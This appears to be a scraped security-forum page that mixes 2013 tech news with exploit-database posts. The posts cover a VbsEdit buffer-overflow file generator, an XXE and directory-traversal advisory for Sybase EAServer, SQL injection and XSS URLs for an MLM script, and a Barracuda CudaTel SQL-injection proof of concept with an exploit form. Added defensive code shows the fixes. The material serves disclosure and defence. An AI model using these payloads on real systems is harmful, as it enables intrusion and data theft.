David Cameron has admitted his plans for opt-out content filters will face "many problems" as his proposals begin to take shape, and said that content such as The Sun's Page 3 or Fifty Shades of Grey would not face the axe. Cameron had asked internet service providers (ISPs) to make adult content filters an opt-in decision, but admitted on the BBC's Jeremy Vine programme that it would be up to the ISPs to decide what to block, suggesting that pornography and self-harming sites would be in their crosshairs. "It will depend on how the companies choose to do it," he said. "It doesn't mean, for instance, it will block access to a newspaper like The Sun, it wouldn't block that, but it would block pornography." He admitted there would be occasions in which these filters would fail, and that they "don't work in every instance. We're not saying it's the be all and end all answer to the problem," he explained.

In addition, he said he did not believe that written pornography – Vine mentioned Fifty Shades of Grey – would be blocked by ISPs, but he remained cautious in saying that ISPs would be the decision-makers in the process. "I'm not saying we've thought of everything and there will be many problems down the line as we deal with this, but we're trying to crunch through these problems and work out what you can do and can't do," he insisted. Cameron's proposals were met with a mixed reaction yesterday. Parent groups and children's charities backed his ideas, while organisations supporting an open internet criticised the prime minister for not understanding how filters really work.
Source: V3.co.uk
-
Espionage-focused cyber attacks on businesses have cost over 508,000 US citizens their jobs, according to McAfee and the Center for Strategic and International Studies (CSIS). The security firm and non-profit organisation revealed the news in their joint Estimating the Cost of Cybercrime and Cyber Espionage paper, confirming that the impact of a successful cyber attack extends beyond purely financial damage. CSIS director and senior fellow of the Technology and Public Policy Program, James Lewis said the job losses could have disastrous consequences for nations' wider economies as well as the individuals concerned. "Using figures from the Commerce Department on the ratio of exports to US jobs, we arrived at a high-end estimate of 508,000 US jobs potentially lost from cyber espionage. As with other estimates in the report, however, the raw numbers might tell just part of the story. If a good portion of these jobs were high-end manufacturing jobs that moved overseas because of intellectual property losses, the effects could be more wide ranging," he said. McAfee executive vice president Michael Fey said the job losses are likely due to a lack of understanding by companies about what to do after suffering a data breach. "As policymakers, business leaders and others struggle to get their arms around why cyber security matters, they need solid information on which to base their actions," he said.

Within the UK the government has already launched several initiatives designed to help businesses that have suffered a breach. These include the launch of a new cyber security awareness campaign by the Home Office and the formation of the Cyber Security Information Sharing Partnership (CISP). CISP is an initiative launched in March designed to facilitate information-sharing about cyber threats between the public and private sector. The report found that as well as job losses, successful cyber raids are costing the US economy between £100bn-$500bn every year. McAfee said the cost largely stems from the loss of financial assets or intellectual property, damage to brand and reputation, consumer losses from fraud, service disruptions following the attack and the basic cost of cleaning up the mess left following a breach. The news follows widespread warnings from the security industry claiming state and criminal hackers are developing new ways to steal businesses' data. Most recently security firm Context reported detecting a marked spike in the number of watering hole attacks targeting industry.
Source: V3.co.uk
-
It's easier to verify, and the scumbags won't take the risk.
-
The donation system is rather risky, in my opinion. Some will want to donate using stolen cards or money made through who knows what methods. It's best done on trust. If someone wants to donate, they simply send Nytro a PM and the transaction takes place between the two of them. Short and to the point.
-
'I have 100,000+ users' details ... please don't blacklist me'
A Turkish security bod calling himself Ibrahim Balic claims his bug reports to Apple sparked the shutdown of Cupertino's Developer Centre website. The iPhone giant pulled the plug on its online home for app programmers last Thursday fearing someone was attempting to hack into its databases. Now Balic has alleged he found 13 security vulnerabilities in the system and exploited them to pull up information on 73 Apple staff. He also claimed he gained access to more than 100,000 developers' private data. But he insists he did this to demonstrate the apparent flaws - reported via bugreport.apple.com - and uploaded a video to protest his innocence (since removed). In an extended mea culpa written after the initial media storm over the Developer Centre outage, the London-based researcher huffed: "I'm not feeling very happy with what I read and I'm a bit irritated, as I did not do this research [to cause] harm or damage. "I didn't attempt to publish or share this situation with anybody else. My aim was to report bugs and collect the data for the purpose of seeing how deep I can go within this scope. I have over 100,000 users' details and Apple is informed about this. I didn't attempt to get the data first and report then, instead I have reported first."

Balic claims the developer website was shut down just four hours after he contacted Apple; he added that the fondleslab titan did not respond to his bug reports. The Reg cannot confirm his allegations, and Apple has not yet commented on Balic's claims. He added: "I do not want my name to be on a blacklist. I'm keeping all the evidence, emails and images. Also I have the records of the bugs that I made through Apple's bug-report [system]." Security market expert Graham Cluley has predicted that Apple may be tempted to take tough action to dissuade any other researchers from probing too hard. He wrote: "Balic may not have been motivated by malice if he did, as appears to be the case, exploit a security hole in Apple’s Developer Centre. But he clearly was operating without Apple’s permission. "As such, the extracting of developers’ personal data from the site could be argued to be unauthorised access, and Apple could – if it wanted – pursue legal action against the researcher. "Whether Apple will choose to pursue legal action in this case remains to be seen. Although it may be bad for its brand image to pursue a researcher who doesn’t appear to have had cybercrime in mind, Apple is a very strange company. Who can forget when Apple encouraged police to look into the loss of its iPhone prototype in a bar, which resulted in the editor of Gizmodo having his house raided?" "Apple is under new management now, but the possibility remains that it may want to make an example of him," he added.
Source: TheRegister.co.uk
-
Data to and from Google's servers now accounts for a quarter of all US internet traffic, according to the latest network analysis by monitoring firm DeepField, with over 60 per cent of all end users and their devices having some business with the Chocolate Factory every day. "While it is old news that Google is BIG, the sheer scale and dominance of Google in the Internet infrastructure has significant implications on network design and evolution," said DeepField founder Craig Labovitz in a blog post. In 2010, back when Labovitz was doing a similar study for Arbor Networks, Google accounted for just 6 per cent of internet traffic, which was big, but still behind the largest ISP. In three years, the Chocolate Factory has expanded its reach dramatically, and Labovitz said the figures understate Google's bigger network share in PC and mobile data. Google's position isn't just down to basic internet traffic, Labovitz said. Mountain View's analytics, hosting, and advertising services are used by over half of US websites and services, all of which adds to "Google’s growing and pervasive dominance." The Chocolate Factory is not the biggest bandwidth hog; that prize goes to Netflix, the report found. Traffic from the video-streaming service peaks at US prime time and during cache-update periods, but in terms of overall network traffic, Google could now be considered bigger than Netflix, Twitter, and Facebook combined, he said.

So what's changed in the last three years? Well, YouTube accounts for a very significant chunk of Google's network traffic in a way similar to Netflix. But Labovitz suggests that Google's rollout of smaller servers to internet service providers, its Google Global Cache (GGC) system, helps account for a lot of the rise. The GGC servers cache a continuously updated collection of Google's most popular content, and are placed with over half of ISPs in the US, as well as in European and South American networks. This speeds access time, but Labovitz notes the Chocolate Factory is also slapping up data centers at a high rate to feed this edge demand. What matters, of course, is that Google can turn this traffic into money at a faster rate than its network costs. In last week's financial results, the company reported healthy profits, but also a rise in capital expenditure to $1.6bn and falling cost-per-click revenues.
Source: TheRegister.co.uk
-
Author : d3b4g
Source : VbsEdit 5.9.3 (.smi) - Buffer Overflow Vulnerability
Code :

#!/usr/bin/python
# Exploit Title: VbsEdit 5.9.3 (.smi file handling) Buffer overflow vulnerability
# Date: 22.7.2013
# Exploit Author: d3b4g
# Vendor Homepage: http://www.vbsedit.com/
# Software Link: http://www.vbsedit.com/
# Tested on: Windows XP SP3
# Twitter: @schaba

# Build the malformed .smi file: a long run of 'A' bytes with a four-byte
# marker in the middle, written out for the target application to open.
chars = "A" * 90000
crush = "\x41\x41\x41\x41"
with open('exp.smi', 'w') as f:
    f.write(chars + crush + chars)
-
Author : SEC Consult
Source : Sybase EAServer 6.3.1 - Multiple Vulnerabilities
Code :

SEC Consult Vulnerability Lab Security Advisory < 20130719-0 >
=======================================================================
title: Multiple vulnerabilities
product: Sybase EAServer
vulnerable version: <=6.3.1
fixed version: vendor did not supply version information
CVE number: -
impact: critical
homepage: http://www.sybase.com
found: 10/2012
by: Gerhard Wagner, Bernhard Mueller
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
Sybase EAServer fully supports all the Web services standards and enables enterprises to rapidly expose business functions as Web services. EAServer also provides a graphical interface to automate the publication and management of your company’s Web services. Today, EAServer supports EJB and Java/CORBA components, CICS integrator, and database stored procedures. These stored procedures can be from all Sybase’s databases including ASE, SQL Anywhere, and IQ; in addition, they will support IBM, Oracle, and Microsoft. EAServer can also support iAnywhere messaging services, enabling the developer to expose these components as Web services.

Business recommendation:
------------------------
The default applications that are deployed by default during the installation of Sybase EAServer should be removed. Further, it is recommended to test the patches provided by Sybase.

Vulnerability overview/description:
-----------------------------------
1) Directory traversal
In order to use a common web server such as IIS as a front end and forward only certain requests to the Sybase EAServer it is a common practice to install and configure the EAServer redirector plug-in. An incoming request will be received by the web server, validated if it matches any context configured within the redirector plug-in and if so forwarded to the appropriate application context. So a request such as the following will be forwarded by the redirector plug-in in case the configuration contains such an application.

https://example.com/myapp -> https://myEAServer/myapp

If the request contains a path like "/\.." the redirector plug-in is not normalising the path as a part of the "myapp" application. Therefore, the request will be passed on to the Sybase EAServer where backslash as well as forward slash are valid directory separators and therefore using such a method it is possible to access all deployed applications.

https://example.com/myapp/%5C../another_application

2) XML entity injection
Due to insufficient input validation it is possible to pass external entity definitions to the server-side XML processor for REST requests with an XML media type. By calling the built-in function testDataTypes() an attacker can list directories and display arbitrary files on the affected system, as long as the files don't conflict with the UTF-8 encoding.

3) OS command execution
The WSH service allows running OS commands and it can only be accessed providing administrative credentials. Using the XXE vulnerability mentioned before it is potentially possible to retrieve the credentials from configuration files and run OS commands using the WSH service.

Proof of concept:
-----------------
1) Directory traversal
The following request allows access to the Sybase EAServer management application:

https://example.com/myapp/%5C../console/Login.jsp

Also the other applications that come by default with Sybase EAServer can be accessed using their respective context, for example:
/rest
/wsh
/wsf
...

2) XML entity injection
The following XML message displays the contents of the drive C: on a Windows system:

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///C:\">]>
<lol>
<dt>
<stringValue>&xxe;</stringValue>
<booleanValue>0</booleanValue>
</dt>
</lol>

3) OS command execution
Due to the potential impact the proof-of-concept has been removed.

Vulnerable / tested versions:
-----------------------------
The issues have been tested in Sybase EAServer 6.3.1 on Windows.

Vendor contact timeline:
------------------------
2013-03-11: Contact the vendor and provide vulnerability information
2013-06-11: Vendor fixes the issues
2013-06-28: Agreement on disclosure date 2013-07-19
2013-07-19: Public disclosure

Solution:
---------
According to the vendor customers can download the latest patches from http://www.sybase.com/downloads. The patches have not been tested by SEC Consult.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter: Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF G. Wagner / @2013
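As an added example (not SEC Consult's or Sybase's code), the two front-end checks that close items 1 and 2 of this advisory: canonicalising a request path before matching it against the forwarded context, so the "/\.." trick is caught in raw, percent-encoded and double-encoded form, and refusing any DOCTYPE in a REST body before the parser reaches the entity declaration. The context list, the naive prefix check and the benign body are assumptions for illustration; the XXE message is the one quoted above.

```python
import posixpath
import re
import xml.parsers.expat
from urllib.parse import unquote

# Application contexts the (hypothetical) redirector is configured to forward.
FORWARDED_CONTEXTS = ("/myapp",)


def naive_prefix_check(raw_path, contexts=FORWARDED_CONTEXTS):
    """The flawed pattern the advisory describes: the raw request path is
    matched against the configured context without normalisation."""
    return any(raw_path.startswith(ctx + "/") for ctx in contexts)


def canonical_path(raw_path):
    """Canonicalise a request path the way the back end will interpret it.

    Percent-decoding repeats until the string is stable so a double-encoded
    backslash (%255C) is caught; backslashes become slashes because EAServer
    accepts both as separators; '.' and '..' segments are then collapsed.
    """
    path = raw_path.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    path = re.sub(r"/+", "/", "/" + path)
    return posixpath.normpath(path)


def forward_decision(raw_path, contexts=FORWARDED_CONTEXTS):
    """Return (forward?, canonical path): forward only when the canonical
    path still lies inside one of the configured contexts."""
    path = canonical_path(raw_path)
    allowed = any(path == ctx or path.startswith(ctx + "/") for ctx in contexts)
    return allowed, path


class DoctypeRejected(ValueError):
    """Raised when a REST body carries a DTD (where the PoC defines its entity)."""


def parse_rest_xml(document):
    """Parse a REST request body with expat and return {element: text}.

    The DOCTYPE handler raises before expat reads any entity declaration and
    parameter-entity parsing is disabled, so a SYSTEM entity never gets the
    chance to touch a file.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    values, stack = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected("DOCTYPE %r not accepted in REST bodies" % name)

    def char_data(data):
        if stack and data.strip():
            values[stack[-1]] = values.get(stack[-1], "") + data

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = lambda name, attrs: stack.append(name)
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = char_data
    parser.Parse(document, True)
    return values


def rest_body_rejected(document):
    """True if parse_rest_xml refuses the body because of a DOCTYPE."""
    try:
        parse_rest_xml(document)
    except DoctypeRejected:
        return True
    return False


# The XML entity injection message from item 2 of the advisory.
XXE_POC = ('<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY > '
           '<!ENTITY xxe SYSTEM "file:///C:\\">]> <lol> <dt> <stringValue>&xxe;</stringValue> '
           '<booleanValue>0</booleanValue> </dt> </lol>')
# A constructed well-formed body with the same element layout and no DTD.
BENIGN_BODY = '<lol><dt><stringValue>hello</stringValue><booleanValue>0</booleanValue></dt></lol>'


if __name__ == "__main__":
    for req in ("/myapp/index.jsp", "/myapp/%5C../console/Login.jsp", "/myapp/%255C../wsh"):
        print(req, "naive:", naive_prefix_check(req), "hardened:", forward_decision(req))
    print("benign parsed:", parse_rest_xml(BENIGN_BODY))
    print("PoC rejected:", rest_body_rejected(XXE_POC))
```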
-
Author : 3spi0n
Source : MLM (Multi Level Marketing) Script - Multiple Vulnerabilities
Code :

##################################################################################
[RevolutionSec ASCII-art banner]
##################################################################################

MLM (Multi Level Marketing) Script, Multiple Vulnerabilities

Product Page: http://www.mlmscript.in/
Author(Pentester): 3spi0n
On Web: RevolutionSec.Com - GraySecure.Org
On Social: Twitter.Com/eyyamgudeer

##################################################################################

[1] SQL Injection Vulnerabilities on Demo Site

[+] (productview.php, prdid Param)
>>> http://server/product/version2/productview.php?prdid='1

[+] (productview.php, uid param)
>>> http://server/product/version2/profileview.php?uid='1

[2] Xss (Cross Site Scripting) Vulnerability on Demo Site

[+] (regcheck_email.php, email param)
>>> http://server/product/version2/regcheck_email.php?email=%3Cvideo%3E%3Csource%20onerror%3d%22javascript%3aprompt%28912327%29%22%3E
-
Author : Vulnerability-Lab
Source : Barracuda CudaTel 2.6.02.040 - SQL Injection Vulnerability
Code :

Title:
======
Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability

Date:
=====
2013-07-20

References:
===========
http://vulnerability-lab.com/get_content.php?id=775

BARRACUDA NETWORK SECURITY ID: BNSEC-723

VL-ID:
=====
775

Common Vulnerability Scoring System:
====================================
8.6

Introduction:
=============
Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server's enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks.

Powerful, Complete Solution
With an expansive feature set and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )

Abstract:
=========
1.1
The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.

1.2
The Vulnerability Laboratory Research Team discovered a client side vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.

Report-Timeline:
================
2012-11-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-11-27: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2012-12-01: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2013-03-01: Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: Dave Farrow]
2013-07-20: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
1.1
A SQL Injection vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application. The vulnerability allows remote attackers or local low privilege application user accounts to inject (execute) own SQL commands to the affected application dbms.

The blind sql injection vulnerability is located in the cdr module when processing to request manipulated row & page parameters as searchstring. A remote attacker can for example delete the standard value context of the module request to inject (execute) own sql commands. Exploitation of the vulnerability requires a low privilege web application user account and no user interaction. Successful exploitation of the vulnerability results in database management system and web application compromise.

Vulnerable Section(s)
[+] search - listing

Vulnerable Module(s)
[+] cdr - searchstring listing

Vulnerable Parameter(s)
[+] &row
[+] &page

1.2
A client side input validation vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application. The non-persistent vulnerability allows remote attackers to manipulate client side application requests to browser.

The second vulnerability (client side) is located in the invalid value exception handling. Remote attackers can provoke the exception-handling by including invalid script code inputs to redisplay the malicious context when processing to load the output. To provoke the exception-handling the remote attacker can use the vulnerable row parameter of the cdr searchstring listing to execute own malicious (client-side) script code. Exploitation of the vulnerability requires no web application user account but medium or high user interaction. Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side external redirects to malware or malicious websites. Exploitation requires medium user interaction.

Vulnerable Section(s):
[+] search - listing

Vulnerable Module(s):
[+] cdr - searchstring listing

Vulnerable Parameter(s):
[+] &row

Affected Module(s):
[+] Exception-Handling (invalid value)

Proof of Concept:
=================
1.1
The sql injection vulnerability can be exploited by remote attackers with low privilege web application user account and without user interaction. For demonstration or reproduce ...

Standard Request: Row 100
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=100&page=1&sortby=end_timestamp&sortorder=desc

Standard Request: Output
---
1. {"count":0,"page":"1","cdr":[],"rows":"100"}

Manipulated Request:
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=100&page='1+1%27[SQL-Injection!]%27--&sortby=end_timestamp&sortorder=desc

... or

http://cudatel.127.0.0.1:1337/gui/cdr/cdr?%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows='1+1%27[SQL-Injection!]%27--&page=1&sortby=end_timestamp&sortorder=desc

Manipulated Output:
---
1.
cdr: []
count: 0
page: 1
rows: 1+2
---
1.
cdr: []
count: 1+2'
page:
- '1335
- '1336
- '1337
- '1
rows: -1+1'[SQL-Injection!]'--

Exploit (PoC):
<html><head><body><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
<title>Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection [PROOF OF CONCEPT]</title>
<script language="JavaScript">
var path="/gui/cdr/cdr"
var adres="?%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows="
var domain ="http://cudatel.127.0.0.1:1337"
var sql = "'1+1%27[SQL-Injection!]%27--"
function command(){
if (document.rfi.target1.value==""){
alert("NOPE!");
return false;
}
rfi.action= document.rfi.target1.value+path+adres+domain+sql;
rfi.submit();
}
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection Exploit
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Vulnerability Research Laboratory (www.vulnerability-lab.com)
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD. & Stealthwalker
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
</script></head><body bgcolor="#000000" link="#990000">
<center><p align="center"><b><font face="Verdana" size="2" color="#006633">Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection Exploit</font>
</b></p><form method="post" target="getting" name="rfi" onSubmit="command();"><div align="left">
<p><b><font face="Arial" size="2" color="#006633">VICTIM:</font></b>
<input type="text" name="target1" size="53" style="background-color: #006633" onMouseOver="javascript:this.style.background='#808080';" onMouseOut="javascript:this.style.background='#808000';"></p>
<p><b><font face="Arial" size="2" color="#006633">EXAMPLE:</font><font face="Arial" size="2" color="#808080"> HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]/</font></b></p></div>
<p align="left"><input type="submit" value="Execute INPUT" name="B1">
</p><p align="left"><input type="reset" value="Clear ALL" name="B2"></p></form><p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe></p><div align="left">
<p align="center"><b><font face="Verdana" size="2" color="#008000">VULNERABILITY-LAB <a href="mailto:research@vulnerability-lab.com"> BKM</a></font></b></p></div></center></body></html>

1.2
The client side input validation vulnerability can be exploited by remote attackers without application user account and with medium required user interaction. For demonstration or reproduce ...

PoC:
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&page=1&sortby=end_timestamp&sortorder=desc

http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=100&page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&sortby=end_timestamp&sortorder=desc

Note: We only verified the bug with the same exception in a not parsed parameter but the bug itself is located in all areas of the invalid exception.

Solution:
=========
1.1
To patch the sql injection it is required to parse the row and page parameters in the cdr module.

1.2
To fix the client side xss vulnerability parse by encoding the row parameter and restrict the input. Encode the affected exception-handling output listing when processing to display invalid input values.

Note: Barracuda Networks provided an update of version 2.6.002.040 to v2.6.003.x to all clients and customers in the bn customer area.

Risk:
=====
1.1
The security risk of the remote sql injection web vulnerability is estimated critical.

1.2
The security risk of the client side input validation web vulnerability is estimated as medium(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
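The two fixes the advisory's Solution section asks for (1.1 parse the row and page parameters before they reach SQL, 1.2 encode the rejected value before it is echoed in the error listing), as an added Python example that is not Vulnerability Lab's or Barracuda's code. It assumes a hypothetical CDR listing handler over an in-memory SQLite table constructed here, with MAX_ROWS and MAX_PAGE as assumed bounds, and puts the unsafe pattern the advisory describes next to the hardened one using the advisory's own PoC values (URL-decoded) as test input.

```python
"""Added example (not Vulnerability Lab's or Barracuda's code): the two fixes the
advisory's Solution section calls for, shown against a hypothetical CDR listing
handler backed by an in-memory SQLite table constructed here."""
import html
import sqlite3
from typing import Optional, Tuple

# Payloads from the advisory's PoC URLs, URL-decoded (constructed test input).
SQLI_PAYLOAD = "'1+1'[SQL-Injection!]'--"
XSS_PAYLOAD = "1'[<iframe src=http://www.vulnerability-lab.com>]"

MAX_ROWS = 1000       # assumed upper bound for a page size
MAX_PAGE = 1_000_000  # assumed upper bound for a page number

Result = Tuple[Optional[list], Optional[str]]  # (rows, html_error)


def build_cdr_db() -> sqlite3.Connection:
    """Constructed sample CDR table: 25 records with increasing end_timestamp."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cdr (id INTEGER PRIMARY KEY, caller TEXT, end_timestamp INTEGER)")
    conn.executemany("INSERT INTO cdr (caller, end_timestamp) VALUES (?, ?)",
                     [(f"100{i}", 1353973149 + i) for i in range(25)])
    return conn


def list_cdr_unsafe(conn: sqlite3.Connection, rows_param: str, page_param: str) -> Result:
    """The pattern the advisory describes: parameters concatenated into the SQL,
    and the rejected value echoed back unescaped in the exception listing."""
    query = (f"SELECT id, caller, end_timestamp FROM cdr ORDER BY end_timestamp DESC "
             f"LIMIT {rows_param} OFFSET ({page_param} - 1) * {rows_param}")
    try:
        return conn.execute(query).fetchall(), None
    except sqlite3.Error as exc:
        # Both defects at once: attacker-controlled SQL, then a raw echo of the input.
        return None, f"<p>Invalid input rows={rows_param} page={page_param}: {exc}</p>"


def parse_bounded_int(raw: str, name: str, lo: int, hi: int) -> int:
    """Fix 1.1: accept only an ASCII decimal integer within [lo, hi]."""
    if not (raw.isascii() and raw.isdigit()):   # rejects quotes, '+', '-', brackets, ''
        raise ValueError(f"{name} must be a decimal integer")
    value = int(raw)
    if not lo <= value <= hi:
        raise ValueError(f"{name} must be between {lo} and {hi}")
    return value


def render_error(name: str, raw: str) -> str:
    """Fix 1.2: the rejected value is HTML-encoded before it reaches the page."""
    return f"<p>Invalid value for {name}: {html.escape(raw, quote=True)}</p>"


def list_cdr(conn: sqlite3.Connection, rows_param: str, page_param: str) -> Result:
    """Hardened handler: validated integers, bound as query parameters."""
    try:
        rows = parse_bounded_int(rows_param, "rows", 1, MAX_ROWS)
    except ValueError:
        return None, render_error("rows", rows_param)
    try:
        page = parse_bounded_int(page_param, "page", 1, MAX_PAGE)
    except ValueError:
        return None, render_error("page", page_param)
    cur = conn.execute(
        "SELECT id, caller, end_timestamp FROM cdr ORDER BY end_timestamp DESC LIMIT ? OFFSET ?",
        (rows, (page - 1) * rows))
    return cur.fetchall(), None


if __name__ == "__main__":
    db = build_cdr_db()
    print(list_cdr_unsafe(db, XSS_PAYLOAD, "1"))  # raw <iframe> echoed in the error
    print(list_cdr(db, XSS_PAYLOAD, "1"))         # escaped: &lt;iframe ...
    print(list_cdr(db, "10", "3"))                # legitimate page: ids 5..1
```

The validation rejects the payloads at the type level (a quote, a `+` or a bracket can never pass `isdigit`), so the SQL never sees them; the parameter binding is the second line of defence for the values that do pass, and the escaping covers the listing the advisory shows reflecting the invalid value.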
